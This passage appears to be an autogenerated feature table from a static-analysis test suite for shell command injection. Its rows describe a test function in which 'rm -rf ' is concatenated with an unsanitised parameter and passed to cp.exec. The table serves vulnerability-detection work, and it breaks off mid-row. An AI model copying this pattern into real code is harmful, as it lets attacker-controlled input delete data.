autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:3 | cp | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:3 | cp | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:8 | cp.exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:5:187:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:5:187:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:5:187:8 | exec | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:5:187:8 | exec | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:5:187:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:10:187:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:22:187:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:6:189:22 | !path.exist(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:6:189:22 | !path.exist(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:6:189:22 | !path.exist(name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:6:189:22 | !path.exist(name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:6:189:22 | !path.exist(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:10 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:10 | path | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:10 | path | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:10 | path | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:10 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:16 | path.exist | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:16 | path.exist | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:16 | path.exist | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:16 | path.exist | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:16 | path.exist | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | exceptional return of path.exist(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | exceptional return of path.exist(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | exceptional return of path.exist(name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | exceptional return of path.exist(name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | exceptional return of path.exist(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:12:189:16 | exist | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:12:189:16 | exist | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:12:189:16 | exist | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:12:189:16 | exist | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:12:189:16 | exist | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 